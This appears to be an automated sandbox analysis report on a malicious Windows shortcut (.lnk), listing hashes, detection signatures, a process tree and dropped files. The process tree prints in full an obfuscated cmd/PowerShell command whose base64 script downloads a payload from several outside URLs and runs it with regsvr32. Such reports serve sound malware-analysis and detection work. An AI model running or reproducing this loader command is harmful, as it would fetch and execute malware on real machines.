Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2024, 03:09
Static task
static1
Behavioral task
behavioral1
Sample
505749e24d2ed2cef8c810c1b363d677192dffa0602562ec1d583d1024428ff3.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
505749e24d2ed2cef8c810c1b363d677192dffa0602562ec1d583d1024428ff3.lnk
Resource
win10v2004-20241007-en
General
-
Target
505749e24d2ed2cef8c810c1b363d677192dffa0602562ec1d583d1024428ff3.lnk
-
Size
2KB
-
MD5
7181932499a362d0f511204daff892a1
-
SHA1
74e4f14fb09a5179df694ad88af7966cbd86c05e
-
SHA256
505749e24d2ed2cef8c810c1b363d677192dffa0602562ec1d583d1024428ff3
-
SHA512
1898ce02e0fc27510c688d1ece348afb38eb86f5525f49b126d11e33fbf6263cff0e84fb3f54a844e26cc8694bb578b00c94f0dcf847e764ae0cf7f12186ed0e
Malware Config
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 9 1156 powershell.exe 19 1156 powershell.exe 21 1156 powershell.exe 25 1156 powershell.exe 27 1156 powershell.exe 31 1156 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe -
pid Process 4868 powershell.exe 1156 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 4976 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4868 powershell.exe 4868 powershell.exe 1156 powershell.exe 1156 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4868 powershell.exe Token: SeDebugPrivilege 1156 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4712 wrote to memory of 4976 4712 cmd.exe 85 PID 4712 wrote to memory of 4976 4712 cmd.exe 85 PID 4976 wrote to memory of 4868 4976 cmd.exe 86 PID 4976 wrote to memory of 4868 4976 cmd.exe 86 PID 4868 wrote to memory of 1156 4868 powershell.exe 88 PID 4868 wrote to memory of 1156 4868 powershell.exe 88 PID 1156 wrote to memory of 5060 1156 powershell.exe 103 PID 1156 wrote to memory of 5060 1156 powershell.exe 103
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\505749e24d2ed2cef8c810c1b363d677192dffa0602562ec1d583d1024428ff3.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c AUG4YD6yp0C8FBd5f4yOYKt/tNMqr+hn0eNExEWFNL6kpdH5+vSvskK5oPd3Sx/oOkWW68Cp||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2djY29uLmluL1VwbG9hZGVkRmlsZXMvVVl0Sk5yVDJsbHh5MS8iLCJodHRwOi8vZ2FrdWRvdS5jb20vcGhvdG8wNi9oRXUvIiwiaHR0cDovL2dpYXNvdHRpLmNvbS9qcy9LaGM2bWIweng0S29XWC8iLCJodHRwOi8vcGxyZXNlbmRlLmNvbS9wY2luZm9yL2NxLyIsImh0dHA6Ly90aG9tYXNtYW50b24uY29tL3dwLWluY2x1ZGVzL293Wm5wV21INEQ4ai8iLCJodHRwOi8vZ2xhLmdlL29sZC9QdVZhZmYvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL2puVVJ4dFJtaU8uU0toO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvam5VUnh0Um1pTy5TS2g7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\Admin\AppData\Local\Temp\xLhSBgzPSx.ps1"; powershell -executionpolicy bypass -file "$env:TEMP\xLhSBgzPSx.ps1"; Remove-Item -Force "$env:TEMP\xLhSBgzPSx.ps1"}"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c "&{[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2djY29uLmluL1VwbG9hZGVkRmlsZXMvVVl0Sk5yVDJsbHh5MS8iLCJodHRwOi8vZ2FrdWRvdS5jb20vcGhvdG8wNi9oRXUvIiwiaHR0cDovL2dpYXNvdHRpLmNvbS9qcy9LaGM2bWIweng0S29XWC8iLCJodHRwOi8vcGxyZXNlbmRlLmNvbS9wY2luZm9yL2NxLyIsImh0dHA6Ly90aG9tYXNtYW50b24uY29tL3dwLWluY2x1ZGVzL293Wm5wV21INEQ4ai8iLCJodHRwOi8vZ2xhLmdlL29sZC9QdVZhZmYvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL2puVVJ4dFJtaU8uU0toO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvam5VUnh0Um1pTy5TS2g7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\Admin\AppData\Local\Temp\xLhSBgzPSx.ps1"; powershell -executionpolicy bypass -file "$env:TEMP\xLhSBgzPSx.ps1"; Remove-Item -Force "$env:TEMP\xLhSBgzPSx.ps1"}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp\xLhSBgzPSx.ps14⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp/jnURxtRmiO.SKh5⤵PID:5060
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD574fd3bb20b5c047c4ef9ff119744dc1f
SHA126ffb8c890a071c7c73c7e90789c4f2f709ddb2d
SHA256950d6a3f91c5f3f823e14f14390f1ad57ddf504256262a778ca1ebe1fb91d2cf
SHA512f1600c164f93cafa4b0e393892b386bf0ef98939316aabf9a90106b8fa3116adae2745a0c8037e72532e2462b973cf8aabb89ceecf9c469d0a2b0a3194c9ae3e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
10KB
MD58ac3a82463a524d1317bf1c4adcdb51a
SHA1819dacbc8cce6dcf4fbe06a870a150c9b04cd92c
SHA25671fd51ec44328266459a49c9d5dd4ef5d8f7ac1bf5d15fcf714feba9340bd087
SHA5125f59066734864db2008ad6588950c0d642abfddd8341799f3b106dff09244b28621708fac4b1e24f0034605eda709ac2842225467d53563de6c21ece4fe7f1a4
-
Filesize
826B
MD59ef7ef1de13a06e15e0216447db3e3e0
SHA157806ff6bf7a70843e3e8c48a0817637c59ea32d
SHA256f1e70694eec2ca06a484fbc575b97c4875cd147c6827020b3a02af23ed7b812e
SHA5120d38d5ed6db9f92289f99d072ed0586ec9e129733d8af54a549e400debb43fedb5bb9c70c64e1585390394fe1b198713866a39907c577b4633d3a9178b74203f